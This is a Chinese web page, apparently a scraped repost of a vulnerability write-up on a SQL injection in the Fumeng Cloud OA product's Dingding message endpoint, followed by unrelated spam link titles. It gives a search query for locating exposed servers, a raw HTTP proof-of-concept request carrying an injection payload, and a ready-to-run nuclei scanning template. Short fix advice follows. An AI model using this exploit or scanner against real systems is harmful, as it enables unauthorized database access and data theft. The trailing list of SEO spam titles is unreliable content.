当前位置: 首页 > news >正文

网站明链怎么做保定网站建设工作

网站明链怎么做,保定网站建设工作,代理公司简介,免费网站在线制作》》》产品描述《《《 孚盟与阿里强强联手将最受青睐的经典C系列产品打造成全新的孚盟云产品,让用户可以用云模式实现信息化管理,让用户的异地办公更加流畅,大大降低中小企业在信息化上成本,用最小的投入享受大型企业级别的信息化…


》》》产品描述《《《

        孚盟与阿里强强联手将最受青睐的经典C系列产品打造成全新的孚盟云产品,让用户可以用云模式实现信息化管理,让用户的异地办公更加流畅,大大降低中小企业在信息化上成本,用最小的投入享受大型企业级别的信息化服务,使中小企业在网络硬件环境、内部贸易过程管理与快速通关形成一套完整解决方案。


》》》漏洞描述《《《

   Web程序中对于用户提交的参数未做过滤直接拼接到SQL语句中执行,导致参数中的特殊字符破坏了SQL语句原有逻辑,攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。


》》》搜索语句《《《

body="hidLicResult" && body="hidProductID"


》》》漏洞复现《《《

POC

POST /m/Dingding/Ajax/AjaxSendDingdingMessage.ashx HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
X-Requested-With: XMLHttpRequest
Content-Length: 51action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+

yaml

id: 孚盟云oa AjaxSendDingdingMessage sql注入漏洞info:name: Potential SQL Injection in Dingding Message Endpointauthor: Kelichenseverity: highdescription: |Potential SQL Injection vulnerability in the Dingding Message Endpoint.This template attempts to exploit the vulnerability by injecting a SQL payload.reference:- http:- raw:- |POST /m/Dingding/Ajax/AjaxSendDingdingMessage.ashx HTTP/1.1Host: {{Hostname}}Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15X-Requested-With: XMLHttpRequestContent-Length: 51action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+matchers-condition: andmatchers:- type: statusstatus:- 200- type: wordwords:- "Microsoft SQL Server"- "MySQL"- "PostgreSQL"- "Oracle"part: body

》》》修复建议《《《

如非必要,禁止公网访问该系统

通过防火墙等安全设备设置访问策略,设置白名单访问。

升级产品到最新版本


-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

http://www.yayakq.cn/news/207952/

相关文章:

  • 东营免费网站制作网站是不是用cms做的
  • 销售型网站怎么做的深圳公司社保网站
  • 简单的电影网站模板农产品信息网站建设方案
  • 做营销网站 如何让商家入驻wordpress 建站容易吗
  • 论坛建立网站建设银行企业网站失败
  • 2024网站推广旅游文创产品设计
  • 去泰国做网站发网站电商网站建设方式
  • 电子商务网站建设与维护方法淘宝网页版官网
  • 莒县建设局官方网站wordpress好还是hexo好
  • 做安全平台网站公司网站建设计入明细科目
  • 班组建设管理网站网站改版合同
  • 谷歌seo推广招聘秦皇岛网络优化招聘
  • 北京网站开发公司一网天行域名注册好了怎么弄网站
  • win10电脑做网站网页和网站区别
  • 陕西省建设工程质量监督局网站php网站开发工程师招聘网
  • c 做网站怎么截取前面的字符微信关联网站
  • 大学代作作业的网站汕尾建设网站
  • 门户网站模板 html查二级建造师个人信息查询
  • 做传媒网站公司类似小红书网站开发费用
  • 在阿里云里网站建设的步骤过程微信公众号转入公司网站建设
  • 五网合一网站建设做原创的网站
  • 蝌蚪窝一个释放做网站网站建设与管理实用教程课后答案
  • 关于网站建设论文代理网址上网
  • 网站建设公司哪家好要选磐石网络html网页设计表格代码范文
  • 中企动力做销售的经历新网站关键词怎么优化
  • 网站查询系统招聘网站官网
  • 网站开发为什么要写接口专业做招聘网站
  • 网站备案归哪里管网站名字设计
  • 微信网站搭建十大营销网站
  • 好的素材下载网站湖北网络推广有限公司